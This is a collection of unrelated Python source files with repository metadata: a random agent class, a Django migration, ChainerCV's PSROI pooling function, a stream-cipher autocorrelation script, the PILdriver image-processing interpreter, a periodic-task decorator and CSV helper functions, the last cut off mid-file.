stars: 8 (2019-06-11T16:08:25.000Z to 2020-10-28T09:03:53.000Z) | issues: 1 (2019-06-21T03:57:35.000Z to 2019-06-21T03:57:35.000Z) | forks: 1 (2018-03-21T15:21:52.000Z to 2018-03-21T15:21:52.000Z)
from . import BaseAgent
class RandomAgent(BaseAgent):
"""The Random Agent that returns random actions given an action_space."""
def act(self, obs, action_space):
return action_space.sample()
avg_line_length: 23.333333 | max_line_length: 77 | alphanum_fraction: 0.714286
hexsha: 2ed9bfa7d05f8c8dc41dd4079a3e9afae6e955a4 | size: 507 | ext: py | lang: Python
path: users/migrations/0023_auto_20201125_1018.py | repo: ominicomdevgt/LaChalupa | head: 3e7ea16fa97aa311bd3513dc463c30c37dfb5761 | licenses: ["MIT"]
stars: null | issues: null | forks: null
# Generated by Django 3.1.2 on 2020-11-25 16:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0022_auto_20201123_1624'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='comment',
field=models.CharField(blank=True, default='Tu cuenta será verificada en un periodo máximo de 1 hora', max_length=1000, null=True, verbose_name='Commentario'),
),
]
avg_line_length: 26.684211 | max_line_length: 171 | alphanum_fraction: 0.642998
hexsha: e359f7b9dcabff9ab63d15cd678da2bceedff927 | size: 16026 | ext: py | lang: Python
path: chainercv/functions/psroi_pooling_2d.py | repo: iory/chainercv | head: ecb1953f78c526dfd38308d68a4094c9f4df3a8d | licenses: ["MIT"]
stars: 1 (2018-08-24T02:28:31.000Z to 2018-08-24T02:28:31.000Z) | issues: null | forks: 2 (2019-12-16T02:20:26.000Z to 2022-01-17T02:00:49.000Z)
# Modified work:
# ------------------------------------------------------------------------
# Copyright (c) 2018 Preferred Networks, Inc.
# ------------------------------------------------------------------------
# Original works of CUDA kernel in forward_gpu and forward_gpu:
# ------------------------------------------------------------------------
# Copyright (c) 2017 Microsoft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Written by Yi Li, Tairui Chen, Guodong Zhang, Haozhi Qi and Jifeng Dai
# https://github.com/msracver/FCIS
# ------------------------------------------------------------------------
from __future__ import division
import numpy as np
import six
from chainer.backends import cuda
from chainer import function
from chainer.utils import type_check
if cuda.available:
import cupy as cp
def _roi_pooling_slice(size, stride, max_size, roi_offset):
start = int(np.floor(size * stride))
end = int(np.ceil((size + 1) * stride))
start = min(max(start + roi_offset, 0), max_size)
end = min(max(end + roi_offset, 0), max_size)
return slice(start, end), end - start
class PSROIPooling2D(function.Function):
def __init__(self, out_c, out_h, out_w, spatial_scale, group_size):
self.out_c, self.out_h, self.out_w = out_c, out_h, out_w
self.spatial_scale = spatial_scale
self.group_size = group_size
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, roi_type, roi_index_type = in_types
type_check.expect(
x_type.dtype == np.float32,
x_type.ndim == 4,
roi_type.dtype == np.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 4,
roi_index_type.dtype == np.int32,
roi_index_type.ndim == 1,
roi_type.shape[0] == roi_index_type.shape[0]
)
def forward_cpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_roi = bottom_rois.shape[0]
top_data = np.empty(
(n_roi, self.out_c, self.out_h, self.out_w), dtype=np.float32)
for i_roi in six.moves.range(n_roi):
y_min, x_min, y_max, x_max = bottom_rois[i_roi]
batch_index = bottom_roi_indices[i_roi]
y_min = round(y_min * self.spatial_scale)
x_min = round(x_min * self.spatial_scale)
y_max = round(y_max * self.spatial_scale)
x_max = round(x_max * self.spatial_scale)
roi_height = max(y_max - y_min, 0.1)
roi_width = max(x_max - x_min, 0.1)
stride_c = channels / self.out_c
stride_h = roi_height / self.out_h
stride_w = roi_width / self.out_w
group_h = int(round(self.out_h / self.group_size))
group_w = int(round(self.out_w / self.group_size))
for out_h in six.moves.range(self.out_h):
slice_h, len_h = _roi_pooling_slice(
out_h, stride_h, height, int(y_min))
if slice_h.stop <= slice_h.start:
continue
for out_w in six.moves.range(self.out_w):
slice_w, len_w = _roi_pooling_slice(
out_w, stride_w, width, int(x_min))
if slice_w.stop <= slice_w.start:
continue
for out_c in six.moves.range(self.out_c):
slice_c, len_c = _roi_pooling_slice(
out_c, stride_c, channels, 0)
roi_data = bottom_data[
batch_index, slice_c, slice_h, slice_w]\
.reshape((len_c, -1))
c = (out_h // group_h) * self.group_size \
+ (out_w // group_w)
top_data[i_roi, out_c, out_h, out_w] = np.average(
roi_data[c])
return top_data,
def forward_gpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_roi = bottom_rois.shape[0]
top_data = cp.empty(
(n_roi, self.out_c, self.out_h, self.out_w), dtype=np.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_data, raw float32 bottom_rois,
raw int32 bottom_roi_indices,
float32 spatial_scale, int32 channels,
int32 height, int32 width,
int32 pooled_dim, int32 pooled_height, int32 pooled_width,
int32 group_size
''',
'float32 top_data',
'''
// pos in output filter
int ph = (i / pooled_width) % pooled_height;
int pw = i % pooled_width;
int ctop = (i / pooled_width / pooled_height) % pooled_dim;
int n = i / pooled_width / pooled_height / pooled_dim;
int roi_batch_ind = bottom_roi_indices[n];
float roi_start_h = static_cast<float>(
round(bottom_rois[n * 4 + 0])) * spatial_scale;
float roi_start_w = static_cast<float>(
round(bottom_rois[n * 4 + 1])) * spatial_scale;
float roi_end_h = static_cast<float>(
round(bottom_rois[n * 4 + 2])) * spatial_scale;
float roi_end_w = static_cast<float>(
round(bottom_rois[n * 4 + 3])) * spatial_scale;
// Force too small ROIs to be 1x1
float roi_height = max(roi_end_h - roi_start_h, 0.1);
float roi_width = max(roi_end_w - roi_start_w, 0.1); // avoid 0
// Compute w and h at bottom
float bin_size_h = roi_height / static_cast<float>(pooled_height);
float bin_size_w = roi_width / static_cast<float>(pooled_width);
int hstart = static_cast<int>(floor(static_cast<float>(ph)
* bin_size_h + roi_start_h));
int wstart = static_cast<int>(floor(static_cast<float>(pw)
* bin_size_w + roi_start_w));
int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
* bin_size_h + roi_start_h));
int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
* bin_size_w + roi_start_w));
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart, 0), height);
wstart = min(max(wstart, 0), width);
hend = min(max(hend, 0), height);
wend = min(max(wend, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Compute c at bottom
int gh = floor(
static_cast<float>(ph) * group_size / pooled_height);
int gw = floor(
static_cast<float>(pw) * group_size / pooled_width);
gh = min(max(gh, 0), group_size - 1);
gw = min(max(gw, 0), group_size - 1);
int c = (ctop * group_size + gh) * group_size + gw;
int data_offset = (roi_batch_ind * channels + c) * height * width;
float out_sum = 0;
for (int h = hstart; h < hend; ++h){
for (int w = wstart; w < wend; ++w){
int bottom_index = h * width + w;
out_sum += bottom_data[data_offset + bottom_index];
}
}
float bin_area = (hend - hstart) * (wend - wstart);
top_data = is_empty? (float) 0. : out_sum / bin_area;
''', 'psroi_pooling_2d_fwd'
)(bottom_data, bottom_rois, bottom_roi_indices,
self.spatial_scale, channels, height, width,
self.out_c, self.out_h, self.out_w, self.group_size,
top_data)
return top_data,
def backward_cpu(self, inputs, gy):
_, bottom_rois, bottom_roi_indices = inputs
channels, height, width = self._bottom_data_shape[1:]
n_roi = bottom_rois.shape[0]
bottom_diff = np.zeros(self._bottom_data_shape, np.float32)
for i_roi in six.moves.range(n_roi):
y_min, x_min, y_max, x_max = bottom_rois[i_roi]
batch_index = bottom_roi_indices[i_roi]
y_min = round(y_min * self.spatial_scale)
x_min = round(x_min * self.spatial_scale)
y_max = round(y_max * self.spatial_scale)
x_max = round(x_max * self.spatial_scale)
roi_height = max(y_max - y_min, 0.1)
roi_width = max(x_max - x_min, 0.1)
stride_c = channels / self.out_c
stride_h = roi_height / self.out_h
stride_w = roi_width / self.out_w
group_h = int(round(self.out_h / self.group_size))
group_w = int(round(self.out_w / self.group_size))
for out_h in six.moves.range(self.out_h):
slice_h, len_h = _roi_pooling_slice(
out_h, stride_h, height, int(y_min))
if slice_h.stop <= slice_h.start:
continue
for out_w in six.moves.range(self.out_w):
slice_w, len_w = _roi_pooling_slice(
out_w, stride_w, width, int(x_min))
if slice_w.stop <= slice_w.start:
continue
for out_c in six.moves.range(self.out_c):
diff_val = gy[0][i_roi, out_c, out_h, out_w]
diff_val = diff_val / len_h / len_w
start_c = int(np.floor(out_c * stride_c))
start_c = min(max(start_c, 0), channels)
c = (out_h // group_h) * self.group_size \
+ (out_w // group_w) + start_c
bottom_diff[batch_index, c, slice_h, slice_w] \
+= diff_val
return bottom_diff, None, None
def backward_gpu(self, inputs, gy):
_, bottom_rois, bottom_roi_indices = inputs
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = cuda.cupy.zeros(self._bottom_data_shape, np.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_diff, raw float32 bottom_rois,
raw int32 bottom_roi_indices,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_dim, int32 pooled_height, int32 pooled_width,
int32 group_size
''',
'float32 top_diff',
'''
int ph = (i / pooled_width) % pooled_height;
int pw = i % pooled_width;
int ctop = (i / pooled_width / pooled_height) % pooled_dim;
int n = i / pooled_width / pooled_height / pooled_dim;
// [start, end) interval for spatial sampling
int roi_batch_ind = bottom_roi_indices[n];
float roi_start_h = static_cast<float>(
round(bottom_rois[n * 4 + 0])) * spatial_scale;
float roi_start_w = static_cast<float>(
round(bottom_rois[n * 4 + 1])) * spatial_scale;
float roi_end_h = static_cast<float>(
round(bottom_rois[n * 4 + 2])) * spatial_scale;
float roi_end_w = static_cast<float>(
round(bottom_rois[n * 4 + 3])) * spatial_scale;
// Force too small ROIs to be 1x1
float roi_height = max(roi_end_h - roi_start_h, 0.1);
float roi_width = max(roi_end_w - roi_start_w, 0.1); // avoid 0
// Compute w and h at bottom
float bin_size_h = roi_height / static_cast<float>(pooled_height);
float bin_size_w = roi_width / static_cast<float>(pooled_width);
int hstart = floor(
static_cast<float>(ph) * bin_size_h + roi_start_h);
int wstart = floor(
static_cast<float>(pw) * bin_size_w + roi_start_w);
int hend = ceil(
static_cast<float>(ph + 1.0) * bin_size_h + roi_start_h);
int wend = ceil(
static_cast<float>(pw + 1.0) * bin_size_w + roi_start_w);
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart, 0), height);
wstart = min(max(wstart, 0), width);
hend = min(max(hend, 0), height);
wend = min(max(wend, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Compute c at bottom
int gh = floor(
static_cast<float>(ph) * group_size / pooled_height);
int gw = floor(
static_cast<float>(pw) * group_size / pooled_width);
gh = min(max(gh, 0), group_size - 1);
gw = min(max(gw, 0), group_size - 1);
int c = (ctop * group_size + gh) * group_size + gw;
int bottom_diff_offset = (roi_batch_ind * channels + c);
bottom_diff_offset = bottom_diff_offset * height * width;
float bin_area = (hend - hstart) * (wend - wstart);
float diff_val = is_empty ? (float) 0. : top_diff / bin_area;
for (int h = hstart; h < hend; ++h){
for (int w = wstart; w < wend; ++w){
int bottom_index = h * width + w;
atomicAdd(
&bottom_diff[bottom_diff_offset + bottom_index], diff_val);
}
}
''', 'psroi_pooling_2d_bwd'
)(bottom_diff, bottom_rois, bottom_roi_indices,
self.spatial_scale, channels, height, width,
self.out_c, self.out_h, self.out_w,
self.group_size, gy[0])
return bottom_diff, None, None
def psroi_pooling_2d(
x, rois, roi_indices, out_c, out_h, out_w,
spatial_scale, group_size
):
"""Position Sensitive Region of Interest (ROI) pooling function.
    This function computes a position-sensitive average of the input spatial
    patch for each of the given regions of interest. Each ROI is split into
    :math:`(group\_size, group\_size)` regions, and a position-sensitive
    value is computed for each region.
Args:
x (~chainer.Variable): Input variable. The shape is expected to be
            4 dimensional: (n: batch, c: channel, h: height, w: width).
rois (array): Input roi. The shape is expected to
be :math:`(R, 4)`, and each datum is set as below:
(y_min, x_min, y_max, x_max). The dtype is :obj:`numpy.float32`.
roi_indices (array): Input roi indices. The shape is expected to
be :math:`(R, )`. The dtype is :obj:`numpy.int32`.
        out_c (int): Channels of the output image after pooling.
        out_h (int): Height of the output image after pooling.
        out_w (int): Width of the output image after pooling.
        spatial_scale (float): Scale by which the roi is resized.
group_size (int): Position sensitive group size.
Returns:
~chainer.Variable: Output variable.
See the original paper proposing PSROIPooling:
`R-FCN <https://arxiv.org/abs/1605.06409>`_.
"""
return PSROIPooling2D(out_c, out_h, out_w, spatial_scale,
group_size)(x, rois, roi_indices)
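# Illustrative usage sketch (hypothetical shapes, added for clarity): with a
# feature map whose channel count equals out_c * group_size * group_size
# (here 8 * 7 * 7 = 392), a single ROI over a 1/16-scale feature map could be
# pooled as follows:
#
#   x = np.random.uniform(size=(1, 392, 38, 50)).astype(np.float32)
#   rois = np.array([[0., 0., 300., 400.]], dtype=np.float32)  # y_min, x_min, y_max, x_max
#   roi_indices = np.zeros((1,), dtype=np.int32)
#   y = psroi_pooling_2d(x, rois, roi_indices, out_c=8, out_h=7, out_w=7,
#                        spatial_scale=1 / 16., group_size=7)
#   # y.shape == (1, 8, 7, 7)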
avg_line_length: 43.430894 | max_line_length: 79 | alphanum_fraction: 0.556408
hexsha: 7bd33472561f0a566151b379605c302860cc8b96 | size: 454 | ext: py | lang: Python
path: 02_streamciphers/autocorrelation.py | repo: StoneSwine/IMT4124-cryptology_software | head: f480ad40a02802d82fdf2a3b35bc2251d5241f89 | licenses: ["Unlicense"]
stars: null | issues: null | forks: null
#!/usr/bin/env python3
# CHANGEME:
S = "110010001111010"
T = 15
k = [0, 2, 5, 14]
def leftShift(text, n):
return text[n:] + text[:n]
def diff_letters(a, b):
return sum(a[i] != b[i] for i in range(len(a)))
print(f"Original: {S}")
for i in k:
acn = leftShift(S, i)
D = diff_letters(S, acn) # A-D/T
print(f"Shifted({i})={acn}\t|\tD={D},\tT={T}\tAC({i})={(((T - D) - D) / T):.2f}")
avg_line_length: 19.73913 | max_line_length: 91 | alphanum_fraction: 0.477974
hexsha: cabdab716025c06213b6ed0e3d92d8ba546f189d | size: 15601 | ext: py | lang: Python
path: www/Scripts/pildriver.py | repo: jeirych/myblog | head: d9452e50ebfbc94275014e60764ce244f9491733 | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
#!f:\mysite\vmaig_blog\www\scripts\python.exe
"""PILdriver, an image-processing calculator using PIL.
An instance of class PILDriver is essentially a software stack machine
(Polish-notation interpreter) for sequencing PIL image
transformations. The state of the instance is the interpreter stack.
The only method one will normally invoke after initialization is the
`execute' method. This takes an argument list of tokens, pushes them
onto the instance's stack, and then tries to clear the stack by
successive evaluation of PILdriver operators. Any part of the stack
not cleaned off persists and is part of the evaluation context for
the next call of the execute method.
PILDriver doesn't catch any exceptions, on the theory that these
are actually diagnostic information that should be interpreted by
the calling code.
When called as a script, the command-line arguments are passed to
a PILDriver instance. If there are no command-line arguments, the
module runs an interactive interpreter, each line of which is split into
space-separated tokens and passed to the execute method.
In the method descriptions below, a first line beginning with the string
`usage:' means this method can be invoked with the token that follows
it. Following <>-enclosed arguments describe how the method interprets
the entries on the stack. Each argument specification begins with a
type specification: either `int', `float', `string', or `image'.
All operations consume their arguments off the stack (use `dup' to
keep copies around). Use `verbose 1' to see the stack state displayed
before each operation.
Usage examples:
`show crop 0 0 200 300 open test.png' loads test.png, crops out a portion
of its upper-left-hand corner and displays the cropped portion.
`save rotated.png rotate 30 open test.tiff' loads test.tiff, rotates it
30 degrees, and saves the result as rotated.png (in PNG format).
"""
# by Eric S. Raymond <esr@thyrsus.com>
# $Id$
# TO DO:
# 1. Add PILFont capabilities, once that's documented.
# 2. Add PILDraw operations.
# 3. Add support for composing and decomposing multiple-image files.
#
from __future__ import print_function
from PIL import Image
class PILDriver(object):
verbose = 0
def do_verbose(self):
"""usage: verbose <int:num>
Set verbosity flag from top of stack.
"""
self.verbose = int(self.do_pop())
# The evaluation stack (internal only)
stack = [] # Stack of pending operations
def push(self, item):
"Push an argument onto the evaluation stack."
self.stack = [item] + self.stack
def top(self):
"Return the top-of-stack element."
return self.stack[0]
# Stack manipulation (callable)
def do_clear(self):
"""usage: clear
Clear the stack.
"""
self.stack = []
def do_pop(self):
"""usage: pop
Discard the top element on the stack.
"""
top = self.stack[0]
self.stack = self.stack[1:]
return top
def do_dup(self):
"""usage: dup
Duplicate the top-of-stack item.
"""
        if hasattr(self.stack[0], 'format'):  # If it's an image, do a real copy
dup = self.stack[0].copy()
else:
dup = self.stack[0]
self.stack = [dup] + self.stack
def do_swap(self):
"""usage: swap
Swap the top-of-stack item with the next one down.
"""
self.stack = [self.stack[1], self.stack[0]] + self.stack[2:]
# Image module functions (callable)
def do_new(self):
"""usage: new <int:xsize> <int:ysize> <int:color>:
Create and push a greyscale image of given size and color.
"""
xsize = int(self.do_pop())
ysize = int(self.do_pop())
color = int(self.do_pop())
self.push(Image.new("L", (xsize, ysize), color))
def do_open(self):
"""usage: open <string:filename>
Open the indicated image, read it, push the image on the stack.
"""
self.push(Image.open(self.do_pop()))
def do_blend(self):
"""usage: blend <image:pic1> <image:pic2> <float:alpha>
Replace two images and an alpha with the blended image.
"""
image1 = self.do_pop()
image2 = self.do_pop()
alpha = float(self.do_pop())
self.push(Image.blend(image1, image2, alpha))
def do_composite(self):
"""usage: composite <image:pic1> <image:pic2> <image:mask>
Replace two images and a mask with their composite.
"""
image1 = self.do_pop()
image2 = self.do_pop()
mask = self.do_pop()
self.push(Image.composite(image1, image2, mask))
def do_merge(self):
"""usage: merge <string:mode> <image:pic1>
[<image:pic2> [<image:pic3> [<image:pic4>]]]
        Merge top-of-stack images in a way described by the mode.
"""
mode = self.do_pop()
bandlist = []
for band in mode:
bandlist.append(self.do_pop())
self.push(Image.merge(mode, bandlist))
# Image class methods
def do_convert(self):
"""usage: convert <string:mode> <image:pic1>
Convert the top image to the given mode.
"""
mode = self.do_pop()
image = self.do_pop()
self.push(image.convert(mode))
def do_copy(self):
"""usage: copy <image:pic1>
Make and push a true copy of the top image.
"""
        self.do_dup()
def do_crop(self):
"""usage: crop <int:left> <int:upper> <int:right> <int:lower>
<image:pic1>
Crop and push a rectangular region from the current image.
"""
left = int(self.do_pop())
upper = int(self.do_pop())
right = int(self.do_pop())
lower = int(self.do_pop())
image = self.do_pop()
self.push(image.crop((left, upper, right, lower)))
    def do_draft(self):
        """usage: draft <string:mode> <int:xsize> <int:ysize> <image:pic1>
        Configure the loader of the top image for a given mode and size.
        """
        mode = self.do_pop()
        xsize = int(self.do_pop())
        ysize = int(self.do_pop())
        image = self.do_pop()
        # Image.draft() configures the loader in place; push the image back.
        image.draft(mode, (xsize, ysize))
        self.push(image)
def do_filter(self):
"""usage: filter <string:filtername> <image:pic1>
Process the top image with the given filter.
"""
from PIL import ImageFilter
        filter = getattr(ImageFilter, self.do_pop().upper())
image = self.do_pop()
self.push(image.filter(filter))
def do_getbbox(self):
"""usage: getbbox
Push left, upper, right, and lower pixel coordinates of the top image.
"""
bounding_box = self.do_pop().getbbox()
self.push(bounding_box[3])
self.push(bounding_box[2])
self.push(bounding_box[1])
self.push(bounding_box[0])
    def do_getextrema(self):
        """usage: getextrema
        Push minimum and maximum pixel values of the top image.
        """
        extrema = self.do_pop().getextrema()
self.push(extrema[1])
self.push(extrema[0])
def do_offset(self):
"""usage: offset <int:xoffset> <int:yoffset> <image:pic1>
Offset the pixels in the top image.
"""
        from PIL import ImageChops
        xoff = int(self.do_pop())
        yoff = int(self.do_pop())
        image = self.do_pop()
        # Image.offset() is no longer available in Pillow; ImageChops.offset() replaces it.
        self.push(ImageChops.offset(image, xoff, yoff))
def do_paste(self):
"""usage: paste <image:figure> <int:xoffset> <int:yoffset>
<image:ground>
Paste figure image into ground with upper left at given offsets.
"""
figure = self.do_pop()
xoff = int(self.do_pop())
yoff = int(self.do_pop())
ground = self.do_pop()
if figure.mode == "RGBA":
ground.paste(figure, (xoff, yoff), figure)
else:
ground.paste(figure, (xoff, yoff))
self.push(ground)
def do_resize(self):
"""usage: resize <int:xsize> <int:ysize> <image:pic1>
Resize the top image.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
image = self.do_pop()
self.push(image.resize((xsize, ysize)))
def do_rotate(self):
"""usage: rotate <int:angle> <image:pic1>
Rotate image through a given angle
"""
angle = int(self.do_pop())
image = self.do_pop()
self.push(image.rotate(angle))
def do_save(self):
"""usage: save <string:filename> <image:pic1>
Save image with default options.
"""
filename = self.do_pop()
image = self.do_pop()
image.save(filename)
def do_save2(self):
"""usage: save2 <string:filename> <string:options> <image:pic1>
Save image with specified options.
"""
filename = self.do_pop()
options = self.do_pop()
image = self.do_pop()
image.save(filename, None, options)
def do_show(self):
"""usage: show <image:pic1>
Display and pop the top image.
"""
self.do_pop().show()
def do_thumbnail(self):
"""usage: thumbnail <int:xsize> <int:ysize> <image:pic1>
Modify the top image in the stack to contain a thumbnail of itself.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
self.top().thumbnail((xsize, ysize))
def do_transpose(self):
"""usage: transpose <string:operator> <image:pic1>
Transpose the top image.
"""
        transpose = self.do_pop().upper()
        image = self.do_pop()
        # Map the operator name (e.g. "FLIP_LEFT_RIGHT") to the PIL constant.
        self.push(image.transpose(getattr(Image, transpose)))
# Image attributes
def do_format(self):
"""usage: format <image:pic1>
Push the format of the top image onto the stack.
"""
self.push(self.do_pop().format)
def do_mode(self):
"""usage: mode <image:pic1>
Push the mode of the top image onto the stack.
"""
self.push(self.do_pop().mode)
def do_size(self):
"""usage: size <image:pic1>
Push the image size on the stack as (y, x).
"""
size = self.do_pop().size
self.push(size[0])
self.push(size[1])
# ImageChops operations
def do_invert(self):
"""usage: invert <image:pic1>
Invert the top image.
"""
from PIL import ImageChops
self.push(ImageChops.invert(self.do_pop()))
def do_lighter(self):
"""usage: lighter <image:pic1> <image:pic2>
Pop the two top images, push an image of the lighter pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.lighter(image1, image2))
def do_darker(self):
"""usage: darker <image:pic1> <image:pic2>
Pop the two top images, push an image of the darker pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.darker(image1, image2))
def do_difference(self):
"""usage: difference <image:pic1> <image:pic2>
Pop the two top images, push the difference image
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.difference(image1, image2))
def do_multiply(self):
"""usage: multiply <image:pic1> <image:pic2>
Pop the two top images, push the multiplication image.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.multiply(image1, image2))
def do_screen(self):
"""usage: screen <image:pic1> <image:pic2>
Pop the two top images, superimpose their inverted versions.
"""
from PIL import ImageChops
image2 = self.do_pop()
image1 = self.do_pop()
self.push(ImageChops.screen(image1, image2))
def do_add(self):
"""usage: add <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled sum with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.add(image1, image2, scale, offset))
def do_subtract(self):
"""usage: subtract <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled difference with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.subtract(image1, image2, scale, offset))
# ImageEnhance classes
def do_color(self):
"""usage: color <image:pic1>
Enhance color in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Color(image)
self.push(enhancer.enhance(factor))
def do_contrast(self):
"""usage: contrast <image:pic1>
Enhance contrast in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Contrast(image)
self.push(enhancer.enhance(factor))
def do_brightness(self):
"""usage: brightness <image:pic1>
Enhance brightness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Brightness(image)
self.push(enhancer.enhance(factor))
def do_sharpness(self):
"""usage: sharpness <image:pic1>
Enhance sharpness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Sharpness(image)
self.push(enhancer.enhance(factor))
# The interpreter loop
def execute(self, list):
"Interpret a list of PILDriver commands."
list.reverse()
while len(list) > 0:
self.push(list[0])
list = list[1:]
if self.verbose:
print("Stack: " + repr(self.stack))
top = self.top()
if not isinstance(top, str):
continue
funcname = "do_" + top
if not hasattr(self, funcname):
continue
else:
self.do_pop()
func = getattr(self, funcname)
func()
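# Illustrative (added) sketch of driving PILDriver programmatically; it assumes
# Pillow is installed and is not part of the original script.
def _pildriver_demo():
    """Build a 100x100 grey image, duplicate it, and push its size.
    Tokens are consumed right-to-left, exactly as on the command line.
    """
    driver = PILDriver()
    driver.execute("size dup new 100 100 128".split())
    return driver.stack  # e.g. [100, 100, <PIL.Image.Image object>]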
if __name__ == '__main__':
import sys
# If we see command-line arguments, interpret them as a stack state
# and execute. Otherwise go interactive.
driver = PILDriver()
if len(sys.argv[1:]) > 0:
driver.execute(sys.argv[1:])
else:
print("PILDriver says hello.")
while True:
try:
if sys.version_info[0] >= 3:
line = input('pildriver> ')
else:
line = raw_input('pildriver> ')
except EOFError:
print("\nPILDriver says goodbye.")
break
driver.execute(line.split())
print(driver.stack)
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
| 29.491493 | 79 | 0.590411 |
da52a8d1d66aee9c4c49d8bb7fd443e5570ea6c6
| 615 |
py
|
Python
|
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
# Thank you https://gist.github.com/Depado/7925679
import threading
# Function wrapper
def periodic_task(interval, times = -1):
def outer_wrap(function):
def wrap(*args, **kwargs):
stop = threading.Event()
def inner_wrap():
i = 0
        while i != times and not stop.is_set():
stop.wait(interval)
function(*args, **kwargs)
i += 1
t = threading.Timer(0, inner_wrap)
t.daemon = True
t.start()
return stop
return wrap
return outer_wrap
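# Illustrative (added) usage sketch, not part of the original module: run a
# heartbeat once a second in a daemon timer thread, then stop it by setting
# the Event returned by the wrapped function.
if __name__ == "__main__":
  import time

  @periodic_task(1)
  def heartbeat():
    print("tick")

  stop_event = heartbeat()  # starts the periodic calls
  time.sleep(3.5)           # roughly three ticks
  stop_event.set()          # stops them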
| 29.285714 | 54 | 0.505691 |
585ee2bdc6bc5d049dd2fbc3b71536efac25ba30
| 3,369 |
py
|
Python
|
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | null | null | null |
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | null | null | null |
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | 12 |
2020-06-15T13:35:15.000Z
|
2021-09-10T00:38:39.000Z
|
import csv
def read_csv(filepath, delimiter=',', encoding='utf-8'):
"""
Reads a CSV file, parsing row values per the provided delimiter. Returns a list
of lists, wherein each nested list represents a single row from the input file.
Parameters:
filepath (str): The location of the file to read.
delimiter (str): delimiter that separates the row values
encoding (str): character encoding
Returns:
list: contains nested "row" lists
"""
with open(filepath, 'r', newline='', encoding=encoding) as file_obj:
data = []
reader = csv.reader(file_obj, delimiter=delimiter)
for row in reader:
data.append(row)
return data
def read_csv_into_dicts(filepath, delimiter=',', encoding='utf-8'):
"""Accepts a file path, creates a file object, and returns a list of
    dictionaries that represent the row values using csv.DictReader().
Note: The first row "header" line provides the key names.
Parameters:
filepath (str): path to file
delimiter (str): delimiter that overrides the default delimiter
encoding (str): character encoding
Returns:
list: nested dictionaries representing the file contents
"""
with open(filepath, 'r', newline='', encoding=encoding) as file_obj:
data = []
reader = csv.DictReader(file_obj, delimiter=delimiter)
for line in reader:
data.append(line) # OrderedDict()
# data.append(dict(line)) # convert OrderedDict() to dict
return data
def write_csv(filepath, data, headers=None, encoding='utf-8'):
"""
Writes data to a target CSV file. Column headers are written as the first
row of the CSV file if optional headers are specified.
Parameters:
filepath (str): path to target file (if file does not exist it will be created)
data (list): content to be written to the target file
headers (seq): optional header row list or tuple.
encoding (str): character encoding
Returns:
None
"""
with open(filepath, 'w', newline='', encoding=encoding) as file_obj:
writer = csv.writer(file_obj)
if headers:
writer.writerow(headers) # add header row
for row in data:
writer.writerow(row) # iterable
else:
writer.writerows(data) # iterable
def write_dicts_to_csv(filepath, data, fieldnames, encoding='utf-8'):
"""
